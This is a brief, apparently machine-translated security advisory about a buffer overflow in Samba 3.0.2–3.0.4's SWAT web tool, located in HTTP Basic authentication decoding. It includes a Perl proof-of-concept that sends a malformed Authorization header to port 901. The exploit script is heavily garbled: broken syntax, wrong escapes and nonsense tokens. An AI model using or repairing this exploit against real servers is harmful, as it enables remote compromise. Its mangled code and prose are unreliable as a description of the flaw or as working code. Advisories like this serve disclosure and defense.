Affected system
Samba 3.0.2
Samba 3.0.3
Samba 3.0.4
Detailed Description Swat is the Samba Web Management Tool. Samba Swat services pre-existent buffer overflow issues, remote attackers can use this vulnerability to perform any instructions on the system on the system. Problems in the conduct HTTP Basic authentication source / lib / util_str.c file base64_decode_data_blob function. Test code #! / Usr / bin / perl # Samba 3.0.4 and prior's SWAT Authorization Buffer Overflow # Created by Noam Rathaus of Beyond Security Ltd. # Uses; user $ host = $ argv [0]; my $ remote = IO :: Socket :: inet-> new (proto => "tcp", peeraddr => $ host PeerPort => "901"); unless "} print" connection- "" "$ trans-}}}},}," connected / n "; $ remote-> autoflush (1); my $ http =" Get / HTTP / 1.1 / RHOST: $ Host: 901 / RUSER-Agent: Mozilla / 5.0 (x11; U; Linux i686; EN-US; RV: 1.7) Gecko / 20040712 Firefox / 0.9.1 / raccept: Text / XML / RACCEPT -LANGUAGE: EN-US, EN; Q = 0.5 / Raccept-Encoding: Gzip, deflate / raccept-charset: ISO-8859-1, UTF-8; Q = 0.7, *; q = 0.7 / rkeep-alive: 300 / rConnection: Keep-alive / rauThorization: Basic = / r / r "; Print" http: [$ http] / n "; Print $ Remote $ http; sleep (1); print" Sent / N "; while (< $ transote>) {print $ _;} print "/ n"; Close $ Remote;